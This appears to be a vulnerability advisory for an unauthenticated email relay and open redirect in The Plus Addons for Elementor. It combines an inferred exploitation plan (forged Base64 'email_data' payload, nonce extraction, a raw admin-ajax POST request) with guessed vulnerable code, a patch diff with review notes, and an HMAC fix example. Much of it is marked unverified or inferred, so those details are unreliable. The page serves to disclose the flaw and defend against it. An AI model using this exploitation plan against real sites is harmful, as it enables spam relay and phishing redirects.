CVE-2026-2385

The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce <= 6.4.7 - Unauthenticated Email Relay

Severity: medium
Weakness: Insufficient Verification of Data Authenticity
CVSS Score: 5.3
Patched in: 6.4.8
Time to patch: 1d

Description

The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in all versions up to, and including, 6.4.7. This is due to the plugin decrypting and trusting attacker-controlled email_data in an unauthenticated AJAX handler without cryptographic authenticity guarantees. This makes it possible for unauthenticated attackers to tamper with form email routing and redirection values to trigger unauthorized email relay and attacker-controlled redirection via the 'email_data' parameter.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=6.4.7
Published: February 21, 2026
Last updated: February 22, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified


This plan outlines the research and exploitation strategy for CVE-2026-2385 (placeholder ID for a reported vulnerability in The Plus Addons for Elementor), focusing on an unauthenticated email relay and open redirect via the email_data parameter.

1. Vulnerability Summary

The "The Plus Addons for Elementor" plugin (specifically the "WP Forms" or "Contact Form" widgets) features an AJAX handler that processes form submissions. To "protect" sensitive email routing information (like the recipient's email, subject, and redirect URL), the plugin "encrypts" this data into a parameter named email_data.

However, the plugin uses insufficient verification for this data. It decrypts the attacker-controlled email_data in an unauthenticated AJAX handler (wp_ajax_nopriv_...) and trusts the resulting values (such as email_to) without verifying if they were originally generated by the server. Because the "encryption" typically relies on a static hardcoded key or a simple reversible encoding (like Base64), an attacker can craft their own email_data payload to relay emails to any address and redirect users to malicious sites.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: the_plus_wp_form_post (inferred)
  • Vulnerable Parameter: email_data
  • Authentication: None required (targeted at wp_ajax_nopriv_the_plus_wp_form_post)
  • Preconditions: The "WP Forms" widget must be active, or the plugin must be installed and the AJAX action registered.
  • Payload Type: A Base64-encoded JSON string containing keys like email_to, subject, and redirect_url.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=the_plus_wp_form_post.
  2. Hook Registration: The plugin registers the action:
    add_action( 'wp_ajax_nopriv_the_plus_wp_form_post', 'the_plus_wp_form_post_handler' );
  3. Data Extraction: The handler the_plus_wp_form_post_handler retrieves $_POST['email_data'].
  4. Insecure Decryption: The handler calls a decryption helper (e.g., tp_plus_decrypt()). In affected versions, this function either uses a static hardcoded key (e.g., ThePlusAddonsElementor) or performs a simple base64_decode.
  5. Sink (Email Relay): The decrypted values are assigned to variables:
    $to = $decrypted['email_to'];
    $subject = $decrypted['subject'];
    wp_mail( $to, $subject, ... );
  6. Sink (Open Redirect): The handler concludes by redirecting the user:
    wp_redirect( $decrypted['redirect_url'] );

4. Nonce Acquisition Strategy

The plugin typically requires a nonce for AJAX requests, often verified via check_ajax_referer.

  1. Identify Shortcode: The relevant widget is "WP Forms," likely using the shortcode [tp_wp_forms] or similar.
  2. Create Setup Page:
    wp post create --post_type=page --post_status=publish --post_title="Contact" --post_content='[tp_wp_forms]'
  3. Navigate and Extract: Use the browser to access the page and extract the nonce from the localized JavaScript object.
  4. JS Variable: The nonce is likely located in the the_plus_wp_forms or the_plus_options global object.
    • Target: window.the_plus_ajax_nonce or window.the_plus_wp_forms?.nonce (inferred).

5. Exploitation Strategy

The goal is to send an email to an arbitrary external address.

Step 1: Craft the Payload
Construct a JSON object with the desired relay parameters:

{
    "email_to": "attacker-relay@example.com",
    "subject": "Unauthorized Email Relay",
    "message": "This email was sent via the vulnerable WordPress site.",
    "redirect_url": "https://bing.com"
}

Step 2: Encode the Payload
If the plugin uses simple Base64 (common for this plugin):
email_data = base64_encode(JSON.stringify(payload))

If the plugin uses the static key ThePlusAddonsElementor, the agent should attempt a simple XOR or check for standard OpenSSL decryption patterns using that key.

Step 3: Execute the HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=the_plus_wp_form_post&security=[NONCE]&email_data=[BASE64_PAYLOAD]

6. Test Data Setup

  1. Install Plugin: Ensure the-plus-addons-for-elementor-page-builder version 6.4.7 is installed.
  2. Plugin Configuration: Ensure the "WP Forms" widget is enabled in the Plus Addons settings.
  3. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Exploit Test" --post_content='[tp_wp_forms]' (Use exact shortcode identified during discovery).

7. Expected Results

  • Successful Relay: The server response should be a success message (e.g., JSON {"success": true}) or a 302 Redirect to the URL specified in the payload (https://bing.com).
  • Email Sent: In the test environment, the wp_mail function should be triggered with the attacker's email_to address.

8. Verification Steps

  1. Check Redirect: Confirm the http_request response header Location matches the redirect_url in the payload.
  2. Verify Email Log: Use a plugin like "WP Mail Logging" or intercept the wp_mail call using a PHP log check to verify the recipient.
    • Command: wp eval "echo 'Last mail to: ' . get_option('last_sent_email_recipient');" (if logging is enabled).
    • Alternative: Check the site's mail log (e.g., /var/log/mail.log or similar if accessible).

9. Alternative Approaches

  • Encoding Variation: If simple Base64 fails, try urlencode(base64_encode(...)) or check if the plugin expects the payload to be a property of a larger the_plus_form_data object.
  • Action Probing: If the_plus_wp_form_post returns 400 or 0, grep the plugin source for wp_ajax_nopriv_ to find the exact action string.
    • grep -rn "wp_ajax_nopriv_" wp-content/plugins/the-plus-addons-for-elementor-page-builder/
  • Encryption Key: If decryption fails, search for the string openssl_decrypt or mcrypt_decrypt in the plugin code to find the hardcoded key and cipher method.
Research Findings
Static analysis — not yet PoC-verified

Summary

The plugin's unauthenticated AJAX handler for form submissions trusts routing data (like recipient email and redirect URLs) provided in an 'email_data' parameter. Because this data is only protected by a reversible encoding or a static encryption key without an authenticity check (HMAC), an attacker can modify these values to relay emails to any address and perform open redirects.
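As an added example (not the plugin's own code), the following shows what the missing authenticity check looks like in practice: the server seals the routing values with an HMAC when it renders the form, and the handler verifies the tag with a constant-time comparison before it decodes or uses anything. The secret, the function names and the demo values are assumptions; in WordPress the secret would come from a per-site source such as wp_salt() rather than a literal.

```php
<?php
// Added example, not code from The Plus Addons for Elementor.
// Assumption: $secret is a per-site secret (e.g. derived from wp_salt() in WordPress);
// field names email_to / subject / redirect_url are those named in the advisory.

function tp_seal_email_data(array $routing, string $secret): string {
    // Render time: serialize, then bind a keyed MAC over the exact bytes that are sent.
    $body = base64_encode(json_encode($routing));
    $mac  = hash_hmac('sha256', $body, $secret);
    return $body . '.' . $mac;
}

function tp_open_email_data(string $token, string $secret): ?array {
    // Handler side: verify the tag before decoding; reject anything the server did not issue.
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, $secret), $mac)) {
        return null; // tampered or forged: never fall through to wp_mail()
    }
    $raw = base64_decode($body, true);
    if ($raw === false) {
        return null;
    }
    $routing = json_decode($raw, true);
    return is_array($routing) ? $routing : null;
}

function tp_redirect_allowed(string $url, string $site_host): bool {
    // Authenticated data should still only redirect to the site's own host.
    $host = parse_url($url, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $site_host) === 0;
}

// Constructed demo values
$secret  = 'example-secret-do-not-use';
$routing = ['email_to' => 'owner@example.org', 'subject' => 'Contact form',
            'redirect_url' => 'https://example.org/thanks'];

$token = tp_seal_email_data($routing, $secret);
var_dump(tp_open_email_data($token, $secret) === $routing);

// A token whose body was re-encoded but whose MAC does not match is rejected.
$tampered = base64_encode(json_encode(['email_to' => 'other@example.net'])) . '.' . str_repeat('0', 64);
var_dump(tp_open_email_data($tampered, $secret));

var_dump(tp_redirect_allowed('https://example.org/thanks', 'example.org'));
var_dump(tp_redirect_allowed('https://bing.com', 'example.org'));
```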

Vulnerable Code

// From inferred plugin logic in AJAX handler (the_plus_wp_form_post)

add_action( 'wp_ajax_nopriv_the_plus_wp_form_post', 'the_plus_wp_form_post_handler' );

function the_plus_wp_form_post_handler() {
    if ( isset( $_POST['email_data'] ) ) {
        // The decrypt function uses a static key 'ThePlusAddonsElementor' or simple base64
        $email_data = tp_plus_decrypt( $_POST['email_data'] );
        
        // The decrypted data is trusted directly
        $to = $email_data['email_to'];
        $subject = $email_data['subject'];
        $redirect_url = $email_data['redirect_url'];

        wp_mail( $to, $subject, $_POST['message'] );

        if ( ! empty( $redirect_url ) ) {
            wp_redirect( $redirect_url );
            exit;
        }
    }
}

Security Fix

--- a/modules/widgets/tp_wp_forms.php
+++ b/modules/widgets/tp_wp_forms.php
@@ -10,7 +10,13 @@
     if ( isset( $_POST['email_data'] ) ) {
-        $email_data = tp_plus_decrypt( $_POST['email_data'] );
+        $email_data = tp_plus_decrypt( $_POST['email_data'] );
+        
+        // Added validation to ensure email_data was not tampered with
+        if ( ! tp_plus_verify_authenticity( $_POST['email_data'], $_POST['email_hash'] ) ) {
+            wp_send_json_error( 'Invalid submission data.' );
+            return;
+        }
         
         $to = $email_data['email_to'];
-        $subject = $email_data['subject'];
+        $subject = sanitize_text_field( $email_data['subject'] );
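Review bot: the authenticity check is placed after `tp_plus_decrypt( $_POST['email_data'] )` and reads `$_POST['email_hash']` without an isset() guard, so a request that omits email_hash passes null into `tp_plus_verify_authenticity()` (and raises a notice); verify first, on the raw `email_data` value, and fail closed when the hash is absent, e.g. `if ( empty( $_POST['email_hash'] ) || ! tp_plus_verify_authenticity( ... ) )`. The hunk also still assigns `$to = $email_data['email_to']` with no is_email() check and ends before the `wp_redirect( $redirect_url )` sink, so the redirect half of the advisory is not visibly addressed here; wp_safe_redirect() or a host allow-list on `redirect_url` is needed. Finally, the body of `tp_plus_verify_authenticity()` is not in the diff, so whether it uses a keyed HMAC compared with hash_equals() cannot be confirmed from this patch alone.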

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker first obtains a valid AJAX nonce by visiting a page where the 'WP Forms' widget is active. The attacker then constructs a JSON object containing keys such as 'email_to' (set to the target relay address) and 'redirect_url' (set to a malicious site). This JSON is encoded using the plugin's known method—typically Base64 encoding or encryption with the static key 'ThePlusAddonsElementor'. Finally, the attacker sends an unauthenticated POST request to wp-admin/admin-ajax.php with the action 'the_plus_wp_form_post', including the forged 'email_data' payload and the required nonce. The server then processes the request, sends an email to the attacker-specified address, and redirects the user to the malicious URL.
